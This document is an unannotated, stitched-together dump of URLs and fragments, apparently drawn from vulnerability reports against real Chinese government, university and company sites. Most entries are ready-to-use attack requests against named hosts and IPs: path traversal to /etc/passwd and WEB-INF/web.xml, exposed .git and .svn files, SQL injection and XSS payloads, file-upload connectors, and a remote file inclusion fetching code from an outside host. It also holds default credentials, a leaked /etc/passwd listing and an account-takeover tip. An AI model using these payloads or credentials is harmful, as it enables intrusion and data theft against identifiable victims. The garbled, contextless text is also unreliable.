https://www.ahpi.gov.cn/defaultroot/login.jsp http://preview.php.net/.git/config http://hk.php.net/.git/config http://shared.php.net/.git/config http://br.php.net/.git/config http://br1.php.net/.git/config http://br2.php.net/.git/config http://master.php.net/.git/config http://master.php.net/.git/config http://mail.php.net/.git/config http://qa.php.net/.git/config http://qa.php.net/.git/config http://nc.php.net/.git/config http://nc1.php.net/.git/config http://bd.php.net/.git/config http://bd1.php.net/.git/config http://tw2.php.net/.git/config http://mx.php.net/.git/config http://lxr.php.net/.git/config http://hk2.php.net/.git/config http://mx1.php.net/.git/config http://at1.php.net/.git/config http://ua2.php.net/.git/config http://ua.php.net/.git/config http://pt2.php.net/.git/config http://dk.php.net/.git/config http://dk1.php.net/.git/config http://id.php.net/.git/config http://id1.php.net/.git/config http://th.php.net/.git/config http://jm2.php.net/.git/config http://jm.php.net/.git/config http://de.php.net/.git/config http://de1.php.net/.git/config http://se2.php.net/.git/config http://is.php.net/.git/config http://ca.php.net/.git/config http://li.php.net/.git/config http://pl1.php.net/.git/config http://pl.php.net/.git/config http://jp2.php.net/.git/config http://ca1.php.net/.git/config http://us2.php.net/.git/config http://ca2.php.net/.git/config http://es.php.net/.git/config http://es1.php.net/.git/config http://se.php.net/.git/config http://it1.php.net/.git/config http://is2.php.net/.git/config http://bg.php.net/.git/config http://bg2.php.net/.git/config http://docs.php.net/.git/config http://euk2.php.net/.git/config http://md1.php.net/.git/config http://preview.php.net/.git/config http://www.ccjdw.com/INFOBLXX.aspx http://218.7.239.170:81/INFOBLXX.aspx http://www.jljszj.gov.cn/INFOBLXX.aspx http://www.thszjz.com/INFOBLXX.aspx http://www.spjdz.com/INFOBLXX.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdSgyuanList.aspx 
http://218.7.239.170:81/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.ccjdw.com/pkpmbs/manager/userfolderlist.aspx http://218.7.239.170:81/pkpmbs/manager/userfolderlist.aspx http://www.jljszj.gov.cn/pkpmbs/manager/userfolderlist.aspx http://www.thszjz.com/pkpmbs/manager/userfolderlist.aspx 
http://www.spjdz.com/pkpmbs/manager/userfolderlist.aspx http://www.ccjdw.com//pkpmbs/portal/InfocontentList.aspx http://218.7.239.170:81//pkpmbs/portal/InfocontentList.aspx http://www.jljszj.gov.cn//pkpmbs/portal/InfocontentList.aspx http://www.thszjz.com//pkpmbs/portal/InfocontentList.aspx http://www.spjdz.com//pkpmbs/portal/InfocontentList.aspx http://www.ccjdw.com//pkpmbs/portal/InfoContentTreeList.aspx http://218.7.239.170:81/pkpmbs/portal/InfoContentTreeList.aspx http://www.jljszj.gov.cn/pkpmbs/portal/InfoContentTreeList.aspx http://www.thszjz.com/pkpmbs/portal/InfoContentTreeList.aspx http://www.spjdz.com/pkpmbs/portal/InfoContentTreeList.aspx http://www.ccjdw.com//pkpmbs/portal/YzgcList.aspx http://218.7.239.170:81//pkpmbs/portal/YzgcList.aspx http://www.jljszj.gov.cn/pkpmbs/portal/YzgcList.aspx http://www.thszjz.com/pkpmbs/portal/YzgcList.aspx http://www.spjdz.com/pkpmbs/portal/YzgcList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://218.7.239.170:81/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.thszjz.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.spjdz.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.ccjdw.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.thszjz.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.spjdz.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.ccjdw.com//pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://218.7.239.170:81/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.jljszj.gov.cn/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.thszjz.com/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.spjdz.com/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.ccjdw.com//pkpmbs/jddoc/googlemap/AddGPS.aspx 
http://218.7.239.170:81//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.jljszj.gov.cn//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.thszjz.com//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.spjdz.com//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.ccjdw.com/pkpmbs/manager/sysuserlist.aspx http://218.7.239.170:81/pkpmbs/manager/sysuserlist.aspx http://www.jljszj.gov.cn/pkpmbs/manager/sysuserlist.aspx http://www.thszjz.com/pkpmbs/manager/sysuserlist.aspx http://www.spjdz.com/pkpmbs/manager/sysuserlist.aspx http://www.ccjdw.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.jljszj.gov.cn//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.thszjz.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.spjdz.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://218.7.239.170:81//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.ccjdw.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://218.7.239.170:81/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.jljszj.gov.cn/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.thszjz.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.spjdz.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.ccjdw.com/pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.jljszj.gov.cn//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.thszjz.com//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.spjdz.com//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://218.7.239.170:81//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.ccjdw.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://218.27.1.143//pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d 
http://www.jljszj.gov.cn//pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.thszjz.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.spjdz.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.wepiao.com/?a=filmdetail&c=film&m=web&fid=5452 http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1002069 http://www.wepiao.com/?a=seatinfo&c=film&mpid=5574e033ba8e7fbb7d8b56f5&scheid=&m=web&cinemaid=1002069&hid=8&fid=5577 http://rs.tongji.edu.cn/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://yjs.njau.edu.cn/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://ssgl.whu.edu.cn//epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://www.urp.fudan.edu.cn:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://rs.whu.edu.cn//epstar/servlet/RaqFileServer?action=open&fileName=../../WEB-INF/web.xml http://211.64.123.12/bj_client/App_Pages/App_page/FAQDetail.aspx?ID=667 http://59.73.148.27:8080/bj_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://218.195.234.37/oa_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://lib.heuet.edu.cn:8080/bj_client/App_Pages/App_page/FAQDetail.aspx?ID=667 http://vrs.lib.xju.edu.cn/oa_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://www.aircraft_co.avic.com/productconent.php?id=221&pid=28&cat_id=49 http://jw.sxjgxy.edu.cn//web/web/lanmu/wenzhaishow.asp?id=44 http://score.xaau.edu.cn//web/web/lanmu/wenzhaishow.asp?id=44 http://220.167.53.63:81//web/web/lanmu/wenzhaishow.asp?id=44 http://www.cdtlgcxx.com:2110//web/web/lanmu/wenzhaishow.asp?id=44 http://jwmis.dzvtc.edu.cn/web/web/lanmu/wenzhaishow.asp?id=44 http://www.xrnet.cn/store/content.php?type=IcpVs&module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F http://kb.xrnet.cn/store/content.php?module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F 
http://hy.xrnet.cn/store/content.php?module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F http://uctest.ucweb.com:81/wml/auth.php?referer=/ ludi:ludi http://timber2005.com/ http://timber2005.com/Customer.html http://px2.timber2005.com http://px2.timber2005.com/WebPage/Paying.aspx?infoid=403 http://px2.timber2005.com/WebPage/Paying.aspx?infoid=403 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 URL:http://b2b.citsgd.com.cn/tuan/?tuan_cust_id=221857 m.mama.cn/index.php?a=SafeFood&d=search&g=Wap http://www.xl-group.com.cn/manage/login.aspx http://www.xl-group.com.cn/search.aspx?keywords= android:icon="@drawable/wk_browser_icon android:label="@string/act_browser_label android:name=".ui.activity.WkBrowserActivity android:theme="@android:style/Theme.NoTitleBar android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="http android:scheme="wkb android:scheme="https android:scheme="about android:scheme="javascript https://mail.cdrcb.com/owa/# http://www.iunmo.com/news/news_show.php?id=33 http://www.55.la/run/user/ajax_email.php http://www.cnoocgh.com.cn/ShipinList.aspx?id=10 http://www.cnoocgh.com.cn/admin/adminlogin.aspx inurl:Usp/?cult=CN inurl:Usp/apabi_usp/ http://site.com/comm/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ http://www.gzweining.gov.cn/Webwsfw/bssh/?subsite=1 http://xpzmjsz.qswtv.com/Webwsfw/bssh/?subsite=1 http://www.jzpsy.cn/Webwsfw/bssh/?subsite=1 http://www.gzuce.com/Webwsfw/bssh/?subsite=1 http://120.27.54.236:8018/Webwsfw/bssh/?subsite=1 http://www.nbhfgzs.com/Webwsfw/bssh/?subsite=1 http://210.40.3.26/Webwsfw/bssh/?subsite=1 http://www.baiweiled.com/Webwsfw/bssh/?subsite=1 
http://www.ihxhd.com/Webwsfw/bssh/?subsite=1 http://www.gzfwz.com/Webwsfw/bssh/?subsite=1 http://www.xszqjyw.com/Webwsfw/bssh/?subsite=1 http://www.gzweining.gov.cn/Webwsfw/ztcx/?bh=1 http://xpzmjsz.qswtv.com/Webwsfw/ztcx/?bh=1 http://www.jzpsy.cn/Webwsfw/ztcx/?bh=1 http://www.gzuce.com/Webwsfw/ztcx/?bh=1 http://120.27.54.236:8018/Webwsfw/ztcx/?bh=1 http://www.nbhfgzs.com/Webwsfw/ztcx/?bh=1 http://210.40.3.26/Webwsfw/ztcx/?bh=1 http://www.baiweiled.com/Webwsfw/ztcx/?bh=1 http://www.ihxhd.com/Webwsfw/ztcx/?bh=1 http://westcd.gzu.edu.cn/Webwsfw/ztcx/?bh=1 http://www.gzfwz.com/Webwsfw/ztcx/?bh=1 http://www.xszqjyw.com/Webwsfw/ztcx/?bh=1 http://219.141.242.25/GRETMS_HT/ http://manage.news.fang.com/.svn/entries https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ www.lngmxx.com为例 http://home.www2.fang.com/ http://wooyun.org/bugs/wooyun-2015-0120150 http://shop1.x.com.cn/uu/member.php?act=user_zhanghu#address http://mail.91jinrong.com http://nf.mail.126.com/netfolder/web/search.do?sid=TAnamFQQxGNXovZZqJQQbcoVEYUhapjf&uid=modasoftsz@126.com&host=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E%3Cscript%3Ealert%28%22hello%20Q1940455934%22%29%3C/script%3E&ver=js5&style=9&skin=cute&color=3e9999#userconsentuserconsent http://219.143.8.123:8080/MasterSP-Ad/common/adheader.jsp http://try.mama.cn/wap/index.php?s=/Report/detail/id/71931 https://code.jquery.com/jquery-1.9.1.min.js http://wealth.cloud.cnfol.com/index.php/service/admin/用户名密码任意输入正确验证码,拦截http请求保存为cnfol,使用sqlmap http://www.jianghai.com/mall.aspx?ly=2 http://zhufu2015.mama.cn http://zhufu2015.mama.cn/List/search http://www.duanxin8888.com http://www.zanpu.com/picture/show/14.html color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red color:red weixin.autohome.com.cn/weixin/ReceiveReplyList?memberid=4378064 weixin.autohome.com.cn/weixin/NoticeList?memberid=4378064 
weixin.autohome.com.cn/weixin/PrivateletterList?memberid=4378064 weixin.autohome.com.cn/weixin/FansList?memberid=4378064 weixin.autohome.com.cn/weixin/UserInfo?memberid=4378064 http://webmail.now.cn/webmail/login.php http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%E2%80%98 http://tms1.zte.com.cn/WorkCost/HumanCost/UI/FillMyWorkHourOut.aspx?span=9%27 http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=GwyCPptlk5Oz6g31JvnAqAfjcQvwDe8j http://119.254.108.204:9999 http://db.duowan.com/mt/mobile/cardDetail.html?id=1 http://wooyun.org/bugs/wooyun-2010-056967 http://bbs.dji.com/uc_server/ http://is.gd/XXXXX http://121.10.253.30:8088/ http://218.75.115.150:8080 https://github.com/zhangdaiscott/jeecg/blob/02d82286e4dcc58c75711a15487f691c7702f553/src/main/java/org/jeecgframework/web/system/controller/core/LoginController.java http://m.xiangguo.com/find/password http://www.szredcross.org.cn/Intro/Memorabilia.aspx?typeID=19 http://www.szredcross.org.cn/Intro/MemorabiliaInfo.aspx?typeID=19 http://114.251.68.238/Default.aspx http://220.163.127.89/Default.aspx http://fax.worde.com:81/ http://fax.shnpl.com/ http://115.236.169.250/ http://oa.suid93.com/ http://114.255.248.186/ http://123.127.55.36/ http://183.129.136.54:81/ http://58.22.87.32/ http://120.198.58.22/ http://mail.tz-china.com/ http://125.71.214.121/ http://120.198.58.22/ http://114.242.135.210/ http://180.166.240.99/ https://code.jquery.com/jquery-1.9.1.min.js http://webadmin.kela.cn/ http://management.kela.cn/ http://webadmin.kela.cn/一看已经200多w会员了,增速好快 http://shop.kela.cn/admin.php http://shop.kela.cn/gift.php?c=gift&a=downloads&filename=../../../../../../../../etc/passwd http://zjsx.si.gov.cn/sxnet/存在注入漏洞 http://www.bolaa.com/?author=XXXXXX http://magazine.tcl.com:80/success.aspx?cmd=subscription&serialno=TCLWATCH0001&email=dd@163.com http://sec.chinabyte.com/412/11432412.shtml http://www.tzzx.net//uc_server/control/admin/db.php 
http://www.tudou.com/viewrecord/info/merge.html?&app=watchcenter&info={"start":0,"rows":50,"needDetail":true,"viewRecords":[{"iid":132457734,"aid":246636,"acode":"","device":0,"viewrecordType":2,"lid":-3,"ct":1434639620658,"done":0,"lvt":27.556}],"selectType":0 http://api.my.letv.com/vcs/list?&pagesize=6&page=1&callback= https://code.jquery.com/jquery-1.9.1.min.js http://MeXss.sinaapp.com/9JSEZf?1434639302 http://l.rcd.iqiyi.com/apis/qiyirc/getrc.php?&cb=%3Cimg%3E&dp=3&only_long=1&terminalId=11 http://l.rcd.iqiyi.com/crossdomain.xml http://jeary.org/flashCSRF http://jeary.org/?post=54 http://pms.zhuzher.com http://pms.zhuzher.com http://passport.game.renren.com/user/info?callback= https://code.jquery.com/jquery-1.9.1.min.js https://passport.tuniu.com/forget/username https://code.jquery.com/jquery-1.9.1.min.js url:http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10021&sex=2 http://www.edingtou.com/invest/investreward?need=3960&max=10100.00&bid=217 http://www.edingtou.com/invest/investreward?bid=116 http://amd-atex.com/ http://amd-atex.com http://qc.light.soufun.com http://bbs.wacai.com/home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&handlekey=propokehk_3864222&infloat=yes&handlekey=a_poke_3864222&inajax=1&ajaxtarget=fwin_content_a_poke_3864222 http://shfy.g.v1.cn/.svn/entries漏洞地址 url:http://219.149.213.11:10000/manager/html user:admin pass:admin http://112.4.228.169:880/ http://www.zwxx.org/tushu/ http://www.dhtfxx.com/tushu/ http://www.gyxsqex.com/tushu/ http://61.175.231.70/dzts/ http://lsxnmxx.js.cn:41516/tushu/ http://222.189.45.162/dzts/ http://112.4.228.169:880/gl_bofangdell.asp?id=11 http://112.4.228.169:880/gl_xiu.asp?id=597752 http://112.4.228.169:880/gl_shan.asp?id=597751 http://112.4.228.169:880/gl_fl_xiu.asp?id=193 http://112.4.228.169:880/gl_fl_shan.asp?id=193 http://112.4.228.169:880/gl_fl_xiu2.asp?id=193 http://112.4.228.169:880/gl_gydell.asp?id=1 http://112.4.228.169:880/gl_lj_shan.asp?id=1 http://112.4.228.169:880/gl_lj_shan2.asp?id=1 
http://112.4.228.169:880/gl_pl_shen.asp?id=55 http://112.4.228.169:880/gl_pl_0.asp?id=1 http://112.4.228.169:880/gl_pl_shan.asp?id=1 http://112.4.228.169:880/gl_tj_1.asp?id=1 http://112.4.228.169:880/gl_tj_2.asp?id=1 http://112.4.228.169:880/gl_tz_shan.asp?id=1 http://112.4.228.169:880/gl_tz_shan2.asp?id=1 http://112.4.228.169:880/gl_tz_she.asp?zt=1 http://112.4.228.169:880/gl_tz_xian.asp?id=1 http://112.4.228.169:880/gl_us_shan.asp?id=23 http://112.4.228.169:880/gl_us_shan2.asp?id=23 http://112.4.228.169:880/gl_xiu.asp?id=23 http://112.4.228.169:880/gl_xiu2.asp?id=23 http://112.4.228.169:880/ta_zw2.asp?t1=1 http://112.4.228.169:880/upfile_tu1.ASP?id=1 http://112.4.228.169:880/ta_chakan.asp?id=1 http://112.4.228.169:880/ta_chakan_dell.asp?id=1 http://112.4.228.169:880/ta_list_dell.asp?id=5 http://112.4.228.169:880/ta_list_show.asp?id=5 http://112.4.228.169:880/ta_list_show2.asp?id=5 http://112.4.228.169:880//down.asp?id=1 http://g.sicnu.edu.cn/ http://www.junrongdai.com/zixun.zip http://wooyun.org/bugs/wooyun-2013-036581 http://wooyun.org/bugs/wooyun-2013-039885 http://wooyun.org/bugs/wooyun-2014-048028 android:exported="true android:name="com.tendcloud.appcpa.ReferralReceiver android:name="com.android.vending.INSTALL_REFERRER"/ http://snr.cnsuning.com/snr/redirectLogin.htm?errorCode=err_authentication http://jiankang.58.com/wenda/question/?doctor=594692 http://**.**.**.**/passport-lost.html http://leyou.com.cn/user/findpwstep1 www.91jinrong.com http://bbs.zsebank.com/bbs/bbs_audit_moderator.jsp?fid=1993 http://sqlmap.org http://cms.che.58.com http://www.codoon.com/backend/blacklist https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ www.lngmxx.com为例 admin:x:0:0::/home/admin:/bin/bash http://www.ujipin.com/user.php?act=login http://bbs.dji.com/.git/config http://forum.dji.com/.git/config http://119.254.100.63:8001/cluster http://ah.189.cn/cms/r/cms/ah/default/activity/college.html 
http://ah.189.cn/service/collegeActivity/verifyNum.action http://voluntaryafc.cmbchina.allyes.com/ http://bank.allyes.com/login.php http://www.caizhimofang.com/member/mmember_newPayPwd.action?sms_vcode=123456&newPassword=aaa3333&re_newPassword=aaa3333 http://www.ikuaishou.com/webservice/exchange.jsp?appkey=1 http://baby.haier.com/baobaoxiu/index.php?c=baby&m=show&babyid=1892&page=41 http://passport.v1.cn/edit/userinfo/uploaduserfacestep2.do http://passport.v1.cn/userupload/5025995.html http://passport.v1.cn/userupload/5025995.exe http://passport.v1.cn/userupload/5025995.exe http://58.118.36.9/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.yongzhong.net/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.hdac.cn/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://42.121.0.194/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://www.hd123z.bjedu.cn/cms/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd http://58.118.36.9/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.yongzhong.net/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.hdac.cn/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd http://42.121.0.194/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.hd123z.bjedu.cn/cms/ckfile.do?path=../../../../../../../../../../etc/passwd http://www.wooyun.org/whitehats/我是壮丁 http://210.22.8.98/login.action http://210.22.8.98/user/settingUser.action http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nagios:x:500:500::/home/nagios:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin webapps:x:501:501::/home/webapps:/bin/bash mysql:x:502:502::/home/mysql:/sbin/nologin ganglia:x:495:492:Ganglia System:/var/lib/ganglia:/sbin/nologin http://mobile.10jqka.com.cn/main/admin/login.php http://gopurchase.haier.com/GOPurchase/ http://gopurchase.haier.com/GOPurchase/page/ 
http://gopurchase.haier.com/GOPurchase/page/Purchase/DC/BDCPurchaseApplyBill/BDCPurchaseApplyBillList.aspx http://125.88.6.227/invoker/EJBInvokerServlet http://218.28.0.149:8080/ http://redmine.huoyunren.com/ http://121.40.80.83/smnsyh http://ovms.stg.sf-express.com:8888 http://g7s.huoyunren.com/ cn.com.open.mooc/shared_prefs/userinfo.xml中的uid=10000,重新加载程序后,即可登录对应uid账号 http://zt.mama.cn/x2/index.php?c=aosmith&a=index&page2=1&keyWord2= http://dynamic.cloud.vip.xunlei.com站点存在jsonp劫持漏洞,可以获得会话session https://github.com/kisszpy/apps/blob/master/app-user/src/main/filter/dev.properties http://121.40.219.51:8080/ http://117.135.134.240/msg/main.do http://beta.tootoo.cn/.svn/entries http://tg.tootoo.cn/buy_business/.svn/entries http://tg.tootoo.cn/.svn/entries http://v3beta.tootoo.cn/.svn/entries http://user.v3beta.tootoo.cn/.svn/entries http://40cee5.l38.yunpan.cn/lk/cQmsh3bi6J5K2 http://123.59.13.114:8080/signup https://github.com/artistgrammer2015 mongodb://127.0.0.1/node_club_dev index.php/Index/login http://dmfc.tootoo.cn/login_Login_login.do http://biz.go.cn/ http://inventory.tootoo.cn/html/inventory/goodsallocation.html http://sms.tootoo.cn//struts/webconsole.html http://dmfc.tootoo.cn//struts/webconsole.html http://www.acsoft.com.cn/RecommendList WebServiceBase.asmx/GetXMLList WebService.asmx/GetFile WebService.asmx/GetFileContent webconfig:Content=1&fileName=web.config http://bx.xiaotong.com.cn/WS/WebServiceBase.asmx/GetXMLList http://ac.qfkd.com.cn/WS/WebServiceBase.asmx/GetXMLList http://122.224.179.212:8000/WS/WebServiceBase.asmx/GetXMLList http://fy.feishang.cn/WS/WebServiceBase.asmx/GetXMLList http://218.17.152.205:8181/WS/WebServiceBase.asmx/GetXMLList http://nrs.nuctech.com/WS/WebServiceBase.asmx/GetXMLList http://114.247.147.253/WS/WebServiceBase.asmx/GetXMLList http://101.68.67.227:81/WS/WebServiceBase.asmx/GetXMLList http://krs.kirisun.com:8086/WS/WebServiceBase.asmx/GetXMLList http://hkahk.dns0755.net:7900//WS/WebServiceBase.asmx/GetXMLList 
http://fol.m4tel.com:1700//WS/WebServiceBase.asmx/GetXMLList http://fol.ck-telecom.com:1800/WS/WebServiceBase.asmx/GetXMLList http://ac.isantai.com:9000/WS/WebServiceBase.asmx/GetXMLList http://bx.xiaotong.com.cn/WS/WebService.asmx/GetFile http://ac.qfkd.com.cn/WS/WebService.asmx/GetFile http://122.224.179.212:8000/WS/WebService.asmx/GetFile http://fy.feishang.cn/WS/WebService.asmx/GetFile http://218.17.152.205:8181/WS/WebService.asmx/GetFile http://nrs.nuctech.com/WS/WebService.asmx/GetFile http://114.247.147.253/WS/WebService.asmx/GetFile http://101.68.67.227:81/WS/WebService.asmx/GetFile http://krs.kirisun.com:8086/WS/WebService.asmx/GetFile http://hkahk.dns0755.net:7900//WS/WebService.asmx/GetFile http://fol.m4tel.com:1700//WS/WebService.asmx/GetFile http://fol.ck-telecom.com:1800/WS/WebService.asmx/GetFile http://ac.isantai.com:9000/WS/WebService.asmx/GetFile 